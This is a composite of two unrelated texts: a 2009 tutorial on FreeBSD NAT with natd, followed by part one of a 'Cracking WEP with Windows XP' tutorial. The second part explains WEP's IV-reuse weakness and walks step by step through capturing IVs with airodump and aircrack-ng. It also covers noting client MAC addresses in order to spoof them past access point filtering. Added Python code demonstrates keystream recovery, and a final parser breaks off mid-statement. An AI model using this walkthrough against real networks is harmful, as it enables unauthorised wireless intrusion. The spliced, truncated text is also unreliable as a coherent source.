18 April, 2009

Network Address Translation (NAT): Another way to conserve IP addresses

bleckock@yahoo.com

bleckock@gmail.com

The original mission of the Internet was to be a non-profit communication network. At first, the Internet was designed without the business world in mind. This has become a problem today and for the future. As the population of the Internet grows, both information seekers and information providers, the need for addresses on the Internet keeps swelling. Large demand for IP addresses typically occurs on corporate computer networks and on the LANs of educational institutions.

An IP address, the means of addressing on the Internet, is increasingly becoming a luxury and an exclusive item. Not just anyone can obtain a valid IP address easily these days. That is why a mechanism that can conserve IP addresses is needed. The simple logic for conserving IP addresses is to share one valid IP address among several other IP clients. In other words, several computers can access the Internet even though we only own a single valid IP address. One such mechanism is provided by Network Address Translation (NAT).

Some Basic Concepts

Before we go further, it is worth reviewing the basic concepts that must be understood before moving on to NAT. They are TCP/IP, Gateway/Router, and Firewall.

TCP/IP

The protocol that has become the standard and is used by almost the entire Internet community is TCP/IP (Transmission Control Protocol/Internet Protocol). For a computer to communicate with other computers, the TCP/IP rules require that computer to have a unique address. That address is called an IP address. An IP address has the format aaa.bbb.ccc.ddd. For example: 167.205.19.33

What matters is that to communicate on the Internet, a computer must have a legal IP address. Legal here means that the address is recognised by every router in the world and is known not to be duplicated anywhere else. Legal IP addresses are usually obtained by contacting InterNIC.

An internal network may use arbitrary IP addresses. However, to connect to the Internet, the network still has to use legal IP addresses. If the routing problem is not sorted out (that is, legal IP addresses are not used), then when our system sends a data packet to another system, the destination system will be unable to return the packet, so no communication takes place.

Communicating on the Internet, or between computer networks, requires a gateway/router as the bridge connecting the nodes between networks so that data packets can be delivered to their destination.

Gateway/Router

A gateway is a computer with at least 2 network interfaces, used to connect 2 or more networks. On the Internet an address can be reached through gateways that provide the route, i.e. which way the data packet must travel to reach its destination. Most gateways run a routing daemon (a program that dynamically updates the routing table). That is why a gateway usually also acts as a router. A gateway/router may be a router box such as those produced by Cisco, 3COM, etc., or it may be a computer running a Network Operating System plus a routing daemon, e.g. a PC with FreeBSD Unix running the Routed or Gated program. When using Natd, however, a routing daemon does not need to run; setting up a gateway is enough.

Because the gateway/router manages data packet traffic between networks, a mechanism for restricting or securing (filtering) data packets can be installed in it. This mechanism is called a Firewall.

Firewall

A Firewall is really a program run on the gateway/router whose job is to inspect every data packet passing through, compare it against the rules that have been applied, and finally decide whether the packet may be forwarded or must be rejected. Its basic purpose is security: protecting the internal network from outside threats. In this article, however, the Firewall is used as the basis for running Network Address Translation (NAT).

In FreeBSD, the program run as the Firewall is ipfw. Before ipfw can be run, the GENERIC kernel must be modified to support the firewall function. Ipfw controls data packet traffic based on source IP, destination IP, port number, and protocol type. To run NAT, the IPDIVERT option must be enabled in the kernel.

DIVERT (the kernel packet diversion mechanism)

A divert socket is really the same as an ordinary IP socket, except that a divert socket can be bound to a special divert port through the bind system call. The IP address in the bind is ignored; only the port number matters. A divert socket bound to a divert port receives every packet diverted to that port by the kernel mechanism, which is driven by the filtering implementation and the ipfw program. This is the mechanism that the Network Address Translator later makes use of.

Those are the preliminary topics that lead us to the core discussion that follows.

Network Address Translation (NAT)

In FreeBSD, the Network Address Translation (NAT) mechanism is run by the Natd program, which works as a daemon. The Network Address Translation Daemon (Natd) provides a solution to this conservation problem by hiding the IP addresses of the internal network, making packets generated inside look as though they came from a machine with a legal IP address. Natd provides connectivity to the outside world without having to use legal IP addresses on the internal network.

Natd provides the Network Address Translation facility for use with divert sockets. Natd rewrites every packet addressed to another host so that its source IP address is that of the Natd machine. For every packet changed under this rule, an entry is made in a translation table to record the transaction.

With NAT, the rule that communication must use legal IP addresses is broken. NAT works by converting IP addresses to one or more other IP addresses. The addresses converted are those assigned to each machine on the internal network (which may be arbitrary). The addresses that result from the conversion lie outside that internal network and are legal, valid/routable IP addresses.

The NAT Mechanism

A TCP packet consists of a header and data. The header has a number of fields; the important ones here are the source and destination MAC (Media Access Control) addresses, the source and destination IP addresses, and the source and destination port numbers.

When machine A contacts machine B, the packet header contains IP A as the source IP address and IP B as the destination IP address. The header also contains a source port number (usually chosen by the sending machine from a pool of port numbers) and a specific destination port number, e.g. port 80 (for the web).

B then receives the packet on port 80 and picks a reply port number to use as the source port in place of port 80. Machine B then swaps the source and destination IP addresses and the source and destination port numbers in the packet header, so that IP B is now the source IP address and IP A the destination IP address. B then sends the packet back to A. As long as the session stays open, data packets travel back and forth using the chosen port numbers.

An ordinary router (without Natd) modifies the source and destination MAC address fields in the header when routing packets that pass through it. The source and destination IP addresses, port numbers and sequence numbers are left untouched.

NAT builds on this. It starts by creating an internal translation table for every internal-network IP address that sends packets through it. It then sets up a table of port numbers to be used with the valid IP address. When a packet from the internal network is handed to Natd for delivery outside, Natd does the following:

1. Records the source IP address and port in the translation table

2. Replaces the packet's source IP number with its own valid IP number

3. Assigns a special port number to the outgoing packet, enters it in the translation table and replaces the original source port number with this special port number.

When the reply packet comes back, Natd checks its destination port number. If it matches a special port number assigned earlier, it consults the translation table and looks up which machine on the internal network it corresponds to. Once found, it rewrites the destination port number and IP address with the original source IP address and port number that were used to start the connection, and sends the packet to the intended machine on the internal network. Natd maintains the translation table entry as long as the connection remains open.
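The translation-table logic of the three steps and the reply path above, as an added example written for this article (it is not natd's source code; the class and method names are my own, and 192.168.1.x, 167.205.19.5 and 203.0.113.10 are constructed sample addresses). It also drops replies from a peer other than the one the internal host contacted, a stricter check than the port match the text describes.

```python
from dataclasses import dataclass, replace


@dataclass(frozen=True)
class Packet:
    """The header fields NAT rewrites (MAC addresses are left to the router)."""
    proto: str
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int


class NatTranslator:
    """Translation table keyed on the special port the translator assigns per flow."""

    def __init__(self, public_ip: str, port_range=(40000, 40100)):
        self.public_ip = public_ip                  # the gateway's valid address
        self._next_port, self._last_port = port_range
        # (proto, nat_port) -> (internal_ip, internal_port, remote_ip, remote_port)
        self.table = {}
        # flow -> nat_port, so one open session keeps one nat_port
        self._by_flow = {}

    def _allocate_port(self) -> int:
        if self._next_port > self._last_port:
            raise RuntimeError("NAT port pool exhausted")
        port, self._next_port = self._next_port, self._next_port + 1
        return port

    def outbound(self, pkt: Packet) -> Packet:
        """Steps 1-3 from the text: record the internal source, swap in the
        public address and a table-assigned port, return the rewritten packet."""
        flow = (pkt.proto, pkt.src_ip, pkt.src_port, pkt.dst_ip, pkt.dst_port)
        nat_port = self._by_flow.get(flow)
        if nat_port is None:
            nat_port = self._allocate_port()
            self._by_flow[flow] = nat_port
            self.table[(pkt.proto, nat_port)] = flow[1:]
        return replace(pkt, src_ip=self.public_ip, src_port=nat_port)

    def inbound(self, pkt: Packet):
        """Reply path: match on the destination port and rewrite back to the
        internal host. Returns None (drop) when no entry exists, which is why
        unsolicited packets from the Internet never reach internal hosts."""
        if pkt.dst_ip != self.public_ip:
            return None
        entry = self.table.get((pkt.proto, pkt.dst_port))
        if entry is None:
            return None
        int_ip, int_port, remote_ip, remote_port = entry
        # Stricter than the text: the reply must come from the peer the
        # internal host contacted, so a third party cannot reuse the port.
        if (pkt.src_ip, pkt.src_port) != (remote_ip, remote_port):
            return None
        return replace(pkt, dst_ip=int_ip, dst_port=int_port)

    def close(self, proto: str, nat_port: int) -> None:
        """Drop the entry once the session ends (it is kept only while open)."""
        entry = self.table.pop((proto, nat_port), None)
        if entry is not None:
            self._by_flow.pop((proto,) + entry, None)


if __name__ == "__main__":
    nat = NatTranslator("167.205.19.5")          # ed1's valid address in the text
    out = nat.outbound(Packet("tcp", "192.168.1.2", 1025, "203.0.113.10", 80))
    print("outbound rewritten to:", out)
    back = nat.inbound(Packet("tcp", "203.0.113.10", 80, "167.205.19.5", out.src_port))
    print("reply delivered to:", back)
    print("unsolicited:", nat.inbound(Packet("tcp", "198.51.100.7", 4444, "167.205.19.5", 40050)))
```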

Figure: example of the Natd mechanism

Differences from a Proxy system

Much like NAT, a small network with a proxy can put several machines behind a single machine with a valid IP address in order to access the web. This is also a cost-saving step compared with having to rent several accounts from the ISP and install a modem and phone line on each machine.

However, such a proxy server is unsuitable for larger networks. Adding hard disk and RAM to the proxy server so that it runs efficiently cannot always be done (because of cost constraints). Moreover, the percentage of web pages that the proxy cache can serve falls as free hard disk space runs out, so that using the proxy cache becomes no better than a direct connection. In addition, every concurrent connection generates an additional process in the proxy. Each of these processes has to use the same disk I/O channel, and when the disk I/O channel saturates, a bottleneck results.

NAT offers a more flexible and scalable solution. NAT removes the need to configure a proxy/socks in every client. NAT is faster and able to handle network traffic for thousands of users simultaneously.

Furthermore, the address translation applied by NAT makes it impossible for crackers on the Internet to attack systems inside the internal network directly. An intruder must first attack and gain access to the NAT machine before staging an attack on machines in the internal network. It is important to know that, although the internal network is protected by NAT, packet filtering and other security measures are still required on the NAT machine.

Example Case: Installing Natd

A small company has a number of computers and a connection to the Internet. The computers already form a LAN. The Internet connection is assumed to be a dedicated T1 link.

The steps to be taken

1. Install FreeBSD

Set aside one computer to become the Gateway. The author recommends FreeBSD RELEASE 2.2.6 (Natd only runs on FreeBSD 2.2.1 and later), because besides being free its hardware requirements are modest. A 486 PC with 16 MB of memory and an 850 MB hard disk is already quite luxurious.

For the FreeBSD installation process, please refer to earlier articles in Infokomputer and to the FreeBSD manual itself.

2. Install the Gateway

Install 2 network interfaces so that this machine becomes a gateway. One Network Card (e.g. NE2000 or 3COM) is connected to the internal network and the other to the ISP link. Suppose both are NE2000 compatible; then the name of the card facing inward is ed0 and the card facing outward is ed1.

Also make sure the option gateway="YES" is written correctly in the rc.conf file. Alternatively, type the command: sysctl -w net.inet.ip.forwarding=1

3. Install the Firewall

Install the IP firewall on this FreeBSD machine. The procedure is:

a. Edit the kernel source in /usr/src/sys/i386/conf

Add the following options to the kernel file.

options IPFIREWALL
options IPFIREWALL_VERBOSE
options "IPFIREWALL_VERBOSE_LIMIT=100"
options IPDIVERT

b. Compile that kernel

c. Enable the firewall in rc.conf by adding

firewall="YES"
firewall_type="OPEN"

4. Install Natd

The steps are as follows:

a. Download the source from ftp://ftp.suutari.iki.fi/pub/natd

b. Unzip and untar the archive with the command

gzip -dc natd_1.12.tar.gz | tar -xvf -

c. Run make and make install in the resulting directory. Type the following commands:

cd natd_1.12
make
make install

d. Edit the startup file so that Natd runs automatically

Create the file natd.sh in /usr/local/etc/rc.d. Its contents are

#!/bin/sh
/sbin/ipfw -f flush
/sbin/ipfw add divert 13494 ip from any to any via ed0
/sbin/ipfw add pass all from 127.0.0.1 to 127.0.0.1
/sbin/ipfw add pass ip from any to any
/usr/local/sbin/natd -port 13494 -interface ed0

The meaning of this file is:

- Flush all firewall rules
- Add the divert feature on port 13494 (you may replace this with any port you like) to divert packets to and from the gateway via interface ed0
- Allow all packets on the local host
- Allow all IP packets on all interfaces
- Run Natd as a daemon listening on port 13494 via interface ed0.

e. Reboot the FreeBSD machine so the settings take effect.

5. Configure the TCP/IP Clients.

Make the IP number of card ed0 on the FreeBSD machine the gateway for each workstation; the IP of each workstation must be in the same network as card ed0 on the gateway machine. For example, if ed0 is given IP number 192.168.1.1 and ed1 167.205.19.5, then the workstations are given IP numbers 192.168.1.2 through 192.168.1.14 if a 16-address mask, 255.255.255.240, is used. ed1 is the interface that holds the valid IP address.

Once all the steps above have been carried out properly, Internet applications on the clients are ready to run via NAT.

In another case, e.g. where the Internet connection uses a modem, the mechanism is the same: just replace the outward-facing interface on the gateway with the modem interface (tun0) and run the ppp program to dial the ISP. Specifically for dial-out, ppp actually has its own mechanism for this case, namely the -alias option. So if we run ppp with the -alias option we do not need to run Natd, because this option provides the same facility as Natd, specifically for dial-out.

Natd is only one way to conserve the dwindling supply of IP addresses. Given the fact that, to join the Internet, an information-seeking host (Client) does not actually need a legal IP address, legal IP addresses can be reserved for information-providing hosts (Servers). Research to keep improving the performance of the Internet continues. A new IP model, IP version 6 (IPv6), is also being developed now, which can accommodate many more computers on the Internet. For the present, however, Natd remains a powerful solution until IPv6 is deployed.

References

Douba, Salim. Networking UNIX: The Complete Reference for UNIX Networks. SAMS Publishing, 1995.

Unix Integration to WAN: Applied Computer Internetworking. CNRG ITB.

FreeBSD Handbook. FreeBSD Inc.

This is part one in a two part paper on Cracking WEP with Windows XP. This first part covers sniffing wireless traffic and
obtaining the WEP key. Part Two will cover associating with a Wireless AP, spoofing your MAC address, trying to log on
administratively to the AP and further things you can carry out on the WLAN once authenticated successfully.


What is WEP:

Wired Equivalent Privacy (WEP) is often mistakenly thought of as a protocol designed to 100% protect wireless traffic, when this
is not the case.
As its name suggests it was designed to give wireless traffic the same level of protection as a wired LAN, which when you think
about it is a very hard thing to set out to do.

LANs are inherently more secure than Wireless LANs (WLANs) due to physical and geographical constraints. For an
attacker to sniff data on a LAN they must have physical access to it, which is obviously easier to prevent than
preventing access to traffic on a WLAN.

WEP works at the lower layers of the OSI model, layers One and Two to be exact, so it therefore does not provide total end to end
security for the data transmission.

WEP can provide a level of security between a Wireless Client and an Access Point or between two wireless clients.


WEP Standards:

WEP is commonly implemented as 64 bit or 128 bit encryption. These encryption strengths are sometimes referred to as 40 bit
or 104 bit because each data packet is encrypted with an RC4 cipher stream that is generated from an RC4 key. For, say, a
64 bit WEP implementation this RC4 key is composed of a 40 bit WEP key and a 24 bit Initialization Vector (IV), hence the
64 bit RC4 key; however the actual WEP part of it is only 40 bits long, the IV taking up the other 24 bits, which is why
a 64 bit WEP key is sometimes referred to as a 40 bit WEP key.

This resultant cipher stream is XORed with the plain text data to encrypt the whole packet. To decrypt the
packet the WEP key is used to generate an identical key stream at the other end to decrypt the whole packet, but
more about this later on; I will also go over the IVs in more detail later on as well.


Failures of WEP:

We have heard everyone say WEP is easy to crack and should not be used, can be cracked in 10 minutes etc but why is this?

Well in my opinion WEP is seriously flawed for the following reasons:

1) Initialization Vectors are reused with encrypted packets. As an IV is only 24 bits long it is only a matter of time before it
is reused. Couple this with the fact that you may have 50+ wireless clients using the same WEP key and the chances of it being reused
improve even further.
An IV is sent in clear along with the encrypted part of the packet. The reuse of any encryption element is always a fundamental
flaw in that particular encryption, and as an IV is sent in clear this further exposes a significant weakness in WEP.

As more RC4 cipher streams are found and more IVs are deciphered, the closer we get to discovering the WEP key.

This is what forms the foundation of WEP cracking.


2) The algorithm used to encrypt a WEP 'hash' is not intended for encryption purposes. The original purpose of the
Cyclic Redundancy Check (CRC-32) was to detect errors in transmission, not to encrypt data.


3) The most significant flaw in my opinion is the mass use of the WEP key. Everything using that particular AP will need the same
WEP key, hence all the resultant traffic will be using the exact same WEP key as well.
The one not so obvious side-effect of this comes when administering the network. If you have 60 wireless clients all
using the same WEP key, do you really want to go and periodically change them all... it is easier to leave it as it
is. I am guilty of doing this on a network I used to administer a few years ago, as I am sure others are who still use WEP.

Wireless Standards:

Today 802.11 has many different implementations for wireless traffic. The most common ones are:

1) 802.11: this specifies that the wireless traffic will use the 2.4GHz frequency band utilizing either Frequency Hopping
Spread Spectrum (FHSS) or Direct Sequence Spread Spectrum (DSSS). FHSS is a protocol whereby the traffic
'hops' to pre-defined frequencies and is commonly used to reduce the effects of noise or interference in the
transmission. DSSS is also a protocol used to reduce noise interference by combining the signal with a higher data rate bit
sequence (commonly called a chipping code) which separates the data up into a logical sequence and attaches a form of CRC to the
packet before transmitting.

2) 802.11a: this provides data transmission in the 5GHz band at a rate of anything up to 54Mbps. Unlike the original
802.11 specification this uses Orthogonal Frequency Division Multiplexing (OFDM) to encode the traffic instead of FHSS or DSSS.
OFDM is a method of transmitting digital data by splitting it up into smaller 'chunks' and transmitting them at
the same time but on different frequencies, which is why the data transfer rate is quite good.

3) 802.11b: came along in 1999 with the intention of allowing wireless functionality to be similar to that provided by
Ethernet. It transmits data in the 2.4GHz band at 11Mbps using DSSS only. It is sometimes called Wi-Fi.

4) 802.11g: this works in the 2.4 GHz band at a rate of 20Mbps or more and came along in 2003. It uses OFDM like 802.11a
and transmits data in a very similar way. However, unlike 802.11a it is backward compatible with 802.11b.

A point worth noting here is if you have an 802.11b Wireless Adaptor you will not be able to receive 802.11g traffic. If you do
want to get in to WEP cracking it is well worth your while investing in a dual band card. I will talk about Wireless Adaptors more
later on.

How do we crack WEP:

Well, cracking WEP is fairly easy to understand if you have followed what I explained above. We briefly touched on IVs and
WEP encryption and how they tie in together. To put it very simply, if you can decipher the IV algorithm you can decrypt or
extract the WEP key.

As I stated before WEP very kindly transmits the IV in clear, so if we can run a mathematical equation against it we can find and
decipher the RC4 stream that encrypted the whole packet in the first place.

The WEP 'key' is the missing value [key] from this mathematical equation. Remember the AP or the client has this
key to use when decrypting the packet, and it is what we must find by running a complicated algorithm against the encrypted packet.

If you think about it like this it may become clearer:

You have an algorithm that is produced by concatenating a randomly generated 24 bit IV with your WEP key. You also have
an RC4 key stream; the two are then 'hashed' together to encrypt the packet.

The IV is the hub of the whole process as this is the only thing that has used your WEP key. If we run a statistical analysis
against the IV to try and decrypt the packet, we can find the key used at the beginning of the process.

When you try to decrypt them, every time you crack a piece of the algorithm the corresponding plain text part of the packet is
revealed; once the whole packet is decrypted you know the algorithm used to encrypt that particular packet. A crude way
of describing it, but as simple as I can make it.

Any attacker can passively collect encrypted data; after a while, due to the limitations explained earlier, two IVs that
are the same will be collected. If two packets with the same IV are XORed, an XOR of the plain text data can be revealed.
This XOR can then be used to infer data about the contents of the data packets.

The more identical IVs collected, the more plain text data can be revealed. Once all the plain text of a data packet is
known, it will also be known for all data packets using the same IV.

So before any transmission occurs WEP combines the keystream with the payload using an XOR process, which produces ciphertext
(data that has been encrypted). WEP includes the IV in clear in the first few bytes of the frame. The receiving AP / Client uses
this IV along with the shared secret key (Your WEP Key) to decrypt the payload of the frame.

XOR is a mathematical algorithm which I am not even going to attempt to explain. This site explains it very well though:
http://mathworld.wolfram.com/XOR.html


So in short, the more identical IVs we can get, the more plain text data we can reveal and the closer we get to
obtaining the key used to encrypt the data in the first place.

As it is not pre-determined when we are going to receive identical IVs, it is impossible to say how many IVs need
to be collected, but more about that later.
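An added example, not part of the original paper, that puts two of the points above into code: the RC4 seed is the 24 bit IV concatenated with the 40 bit key, and two frames encrypted under the same IV share a keystream, so XORing their ciphertexts cancels the keystream and leaves the XOR of the plaintexts (a known plaintext then gives the other one). The RC4 routine is a textbook implementation written for this example; the key, IV and frame bodies are constructed sample values, and the collision-probability helper is the standard birthday calculation, which the paper itself does not give.

```python
import math

IV_BITS = 24                 # WEP IV length; it is sent in clear in front of each frame
IV_SPACE = 1 << IV_BITS      # 16,777,216 possible IVs per WEP key


def rc4_keystream(seed: bytes, length: int) -> bytes:
    """Textbook RC4 (KSA then PRGA): return `length` keystream bytes for `seed`."""
    s = list(range(256))
    j = 0
    for i in range(256):                        # key-scheduling algorithm
        j = (j + s[i] + seed[i % len(seed)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):                     # pseudo-random generation
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor_bytes(a: bytes, b: bytes) -> bytes:
    """XOR two byte strings, truncated to the shorter one."""
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """WEP-style framing: seed = IV || key, body = plaintext XOR keystream.
    Returns the 3 clear IV bytes followed by the ciphertext (ICV omitted)."""
    if len(iv) != IV_BITS // 8:
        raise ValueError("WEP IV must be 3 bytes")
    keystream = rc4_keystream(iv + key, len(plaintext))
    return iv + xor_bytes(plaintext, keystream)


def wep_decrypt(key: bytes, frame: bytes) -> bytes:
    """The receiver reads the clear IV and rebuilds the same seed and keystream."""
    iv, body = frame[:3], frame[3:]
    return xor_bytes(body, rc4_keystream(iv + key, len(body)))


def plaintext_xor_from_iv_reuse(frame1: bytes, frame2: bytes) -> bytes:
    """Two frames under the same IV: c1 XOR c2 == p1 XOR p2, no key needed."""
    if frame1[:3] != frame2[:3]:
        raise ValueError("frames use different IVs; their keystreams are unrelated")
    return xor_bytes(frame1[3:], frame2[3:])


def recover_other_plaintext(frame1: bytes, frame2: bytes, known_p1: bytes) -> bytes:
    """Knowing one plaintext under a reused IV reveals the other: p2 = c1 ^ c2 ^ p1."""
    return xor_bytes(plaintext_xor_from_iv_reuse(frame1, frame2), known_p1)


def iv_collision_probability(frames: int, space: int = IV_SPACE) -> float:
    """Probability that at least two of `frames` uniformly random IVs repeat
    (birthday problem): 1 - prod_{k<frames} (1 - k/space)."""
    log_no_repeat = sum(math.log1p(-k / space) for k in range(frames))
    return 1.0 - math.exp(log_no_repeat)


if __name__ == "__main__":
    KEY = bytes.fromhex("0102030405")           # constructed 40 bit WEP key
    IV = bytes.fromhex("000001")                # constructed IV, reused for both frames
    P1 = b"GET / HTTP/1.0\r\n"                  # constructed frame bodies
    P2 = b"PUT / HTTP/1.0\r\n"
    f1, f2 = wep_encrypt(KEY, IV, P1), wep_encrypt(KEY, IV, P2)
    print("c1 ^ c2 == p1 ^ p2:", plaintext_xor_from_iv_reuse(f1, f2) == xor_bytes(P1, P2))
    print("second plaintext from the first:", recover_other_plaintext(f1, f2, P1))
    print("P(some IV repeats) after 5000 frames: %.2f" % iv_collision_probability(5000))
```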

Software Used:

For this attack I am going to use aircrack-ng for Windows which can be obtained from here:
http://tinyshell.be/aircrackng/wiki/index.php?title=Aircrack-ng
Whilst here download cygwin1.dll and paste it in to the same folder as Aircrack-ng. There is a copy of cygwin1.dll included
already but the one available from the tinyshell site is a later version of it.
The peek.dll and peek5.sys files also need to be in the same directory as aircrack. They are available
http://www.aircrack-ng.org/doku.php?id=downloads&DokuWiki=ae7e6106d0b7685530d083fb6b8a9761
If you download Winaircrack - which is a GUI version of what I cover in this paper - copy the peek.dll and peek5.sys files across
to where you have aircrack stored. You will get a peek driver not found message if you dont do this.

Once it has downloaded you have the option of pasting its directory path into your Command Prompt PATH so you can start the
application straight from the command line without having to 'CD' to the correct directory.
For example I copied this into my path: C:\Documents and Settings\Nokia\Desktop\aircrack-ng-0.3-win\aircrack-ng-0.3-win\bin
In the bin folder are airodump and aircrack-ng, so now I can just type airodump straight into the command prompt to run
the application.

To add something to your path:

Right click My Computer > Properties > Advanced > Environment Variables > Under System Variables highlight PATH >
Edit > enter the directory path using a ; to separate it from any existing entries.

You also need to go to Wild Packets to pick up a new driver for your card. http://www.wildpackets.com/

I have found that the most common cause of stress when trying to crack WEP is incompatible hardware. The Airopeek driver from Wild
Packets is not compatible with all types of hardware. There is a list of supported adaptors and the relevant driver you need to
use on the web site.

For this crack I am using an Atheros based NETGEAR WAG511 DUAL BAND adaptor which you can get from any good electrical store for
around 40 AUD.

This card works with Whax, Auditor and BackTrack pretty much straight out of the box. It is also dual band, so you don't
have to worry about whether the WLAN you are sniffing uses a band that your wireless adaptor does not support. It is my
preferred Wireless Adaptor and has not let me down yet.
Most cards that are Atheros based will have the Atheros logo on the side of the box; use one of these if possible.

**Some people I know have confused the NETGEAR WG511 which does not work, with the NETGEAR WG511T which does work so try not to
fall in to this trap**

Cards that I can 100% say to stay away from are ones that use the PrismGT chipset. Conexant cards are also a complete waste of
time (which I found out the hard way), so please do not even think about buying one of these if you want to crack WEP.

See this list to check what chipset your card uses:
http://www.linux-wlan.org/docs/wlan_adapters.html.gz

So you should now have:

Aircrack-ng
Cygwin1.dll, in the same directory as Aircrack
Peek.dll and Peek5.sys in the same directory as Aircrack
Relevant Drivers from Wild Packets for your Adaptor
Added aircrack-ng to your PATH
Got an Adaptor that works with all of the above!

So what's next?

Now we need to install the driver you have downloaded.
**Warning: the next procedure will overwrite your existing Windows driver, so make sure you have the disc or a backup of
it before carrying on.**

The peek driver will not let you use your Wireless Adaptor in the conventional way. You won't be able to associate to an
AP with it or browse the internet etc.

99% of Windows drivers are designed to make your Wireless Adaptor reject any 802.11 traffic not destined for it. The Peek driver
puts your Adaptor into a promiscuous mode to allow it to sniff all 802.11 traffic that is compatible with your adaptor.

To install the driver open up your Device Manager and right click on your wireless adaptor > Update Driver > Install from a
Specific Location > Don't Search, I will choose the driver to install > Have Disk > Browse to where you have
downloaded the driver > Double Click.

Windows may display a prompt warning you that the driver is not digitally signed; if this happens click Continue Anyway.

Once the driver is installed we are ready to crack WEP.

**If you get an error message saying 'The specified destination contains no information about your device', you
have either downloaded the wrong driver or, more likely, your Wireless Adaptor is not compatible with what we need it to do.**

Cracking WEP:

Cracking WEP is by no means a skilful thing to do, as all the hard work was done by Chris Devine, who is the excellent coder of
Aircrack; all we need to do is collect the data and start the program. If you have questions about Aircrack a good place to post
them is on the Netstumbler Linux Forums as I believe the author checks there quite often. Alternatively you can email the author at
devine [at] iie [dot] cnam [dot] fr; whether he will reply or not I don't know, but I wouldn't have
thought he will appreciate you emailing him with stupid questions, so use the forum for these!


Airodump

So open a command prompt and type Airodump, or if you have not added it to your PATH you will need to CD to the right
directory.

A new window opens now which will search for all installed wireless adaptors, give it a numerical signature and display the
following:
Code:
usage: airodump [ivs only flag]

Known network adapters:

14 NETGEAR WG511T 54 Mbps Wireless PC Card
22 NETGEAR WAG511 802.11a/b/g Dual Band Wireless PC Card

Network interface index number ->


Select the relevant ID for the card you want to use:
Code:
Network interface index number -> 22


You are then prompted to enter the type of chipset of your card:
Code:
Interface types: 'o' = HermesI/Realtek
'a' = Aironet/Atheros

Network interface type (o/a) ->


We are using an Atheros card so we enter 'a':
Code:
Network interface type (o/a) -> a


Then you are asked what channel you would like it to sniff traffic on:
Code:
Channel(s): 1 to 14, 0 = all ->


The USA only uses up to channel 11 and Europe uses up to channel 14. Channel 11 in the UK is the most common one that wireless
APs default to, however, so I normally start off with channel 11. If you want to scan all channels use the 0 option.

We shall use channel 11:
Code:
Channel(s): 1 to 14, 0 = all -> 11


Now you are asked what you would like to save your capture file as:
Code:
(note: if you specify the same output prefix, airodump will resume the capture session by appending data to the existing capture
file)

Output filename prefix ->


If you specify a file name that you have already used the resulting data will be added to the file, which is an excellent
feature if it becomes apparent later on that you do not have enough IVs, as you won't have to start all over
again!
Code:
Output filename prefix ->WEP1


Now you are asked if you only want to save the IVs or all packets that are sniffed.
Code:
(note: to save space and only store the captured WEP IVs, press y.The resulting capture file will only be useful for WEP
cracking)

Only write WEP IVs (y/n) ->


As we know, to crack a WEP key we only need IVs, so we can select yes to this question. The resultant file will be saved as
an .IVS file.
Code:
Only write WEP IVs (y/n) -> y


So now we have told it everything it needs to know, let's see what happens:
Code:

BSSID PWR Beacons # Data CH MB ENC ESSID

00:09:5B:FD:C6:52 10 3 6 11 54 OPN HOMEWIRELESS
00:30:F1:F5:A1:35 60 359 1234 11 54 WEP Stuart

BSSID STATION PWR Packets ESSID

00:09:5B:FD:C6:52 00:09:5B:B6:1D:2A 17 6 HOMEWIRELESS
00:30:F1:F5:A1:35 00:09:5B:84:A6:DF 87 1793 Stuart


This is the output from a successful Airodump start-up.

BSSID = The MAC address of the wireless access point.
PWR = The strength of the signal being received.
BEACONS = Every AP transmits around 10 beacons per second. These are not encrypted and are useless to us from a WEP cracking point of view; they basically say "I'm an AP, come and associate with me".
DATA = This is what we are interested in. DATA packets carry the IVs that we need.
ENC = Encapsulation (WEP / WPA / OPEN etc.); speaks for itself.
ESSID = The name of the wireless network. This is not always broadcast by the AP, but we will need it to associate with the AP later on.

The second part lists any associated clients that are talking to the AP. MAKE A NOTE OF THESE MAC ADDRESSES.

Some APs have MAC address filtering enabled. This is a table of MAC addresses stored on the AP: when you try to associate with the AP, and MAC filtering is enabled, the AP checks your MAC against the list of allowed MACs to decide whether you may associate. If it is not in the list, regardless of whether you have the correct WEP key or not, you will not be allowed to associate with the AP. You will also leave an entry in the logs.
This is a very helpful feature of Airodump that informs us what we need to spoof our MAC to when associating with the AP.
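As an added example (not the tutorial's own code), here is a small Python parser for the airodump-ng table shown above. It takes the output as constructed sample text, extracts the AP and client sections, and flags APs whose ENC column is WEP or OPN, which is how a network owner would inventory legacy or absent encryption on their own estate before it is attacked the way this page describes.

```python
"""Parse airodump-ng text output and flag weakly encrypted access points.
Added example, not part of the original tutorial; SAMPLE is constructed
from the table shown on this page."""
import re
from dataclasses import dataclass

# Constructed sample, modelled on the airodump-ng output above.
SAMPLE = """
BSSID PWR Beacons # Data CH MB ENC ESSID

00:09:5B:FD:C6:52 10 3 6 11 54 OPN HOMEWIRELESS
00:30:F1:F5:A1:35 60 359 1234 11 54 WEP Stuart

BSSID STATION PWR Packets ESSID

00:09:5B:FD:C6:52 00:09:5B:B6:1D:2A 17 6 HOMEWIRELESS
00:30:F1:F5:A1:35 00:09:5B:84:A6:DF 87 1793 Stuart
"""

MAC = r"(?:[0-9A-F]{2}:){5}[0-9A-F]{2}"
# AP row: BSSID PWR Beacons Data CH MB ENC ESSID
AP_RE = re.compile(rf"^({MAC})\s+(\d+)\s+(\d+)\s+(\d+)\s+(\d+)\s+(\d+)\s+(\S+)\s+(.*)$")
# Client row: BSSID STATION PWR Packets ESSID
STA_RE = re.compile(rf"^({MAC})\s+({MAC})\s+(\d+)\s+(\d+)\s+(.*)$")
WEAK = {"WEP", "OPN"}  # encryption values a defender should not see in 2009+

@dataclass
class AccessPoint:
    bssid: str
    channel: int
    data: int
    enc: str
    essid: str

def parse(text):
    """Return ({bssid: AccessPoint}, {bssid: [client MAC, ...]})."""
    aps, clients = {}, {}
    for line in text.splitlines():
        line = line.strip()
        m = STA_RE.match(line)  # two MACs in a row: this is a client line
        if m:
            clients.setdefault(m.group(1), []).append(m.group(2))
            continue
        m = AP_RE.match(line)
        if m:
            aps[m.group(1)] = AccessPoint(m.group(1), int(m.group(5)),
                                          int(m.group(4)), m.group(7),
                                          m.group(8).strip())
    return aps, clients

def weak_aps(text):
    """Audit finding: APs with no encryption or WEP, with attached clients."""
    aps, clients = parse(text)
    return {b: (ap.enc, clients.get(b, []))
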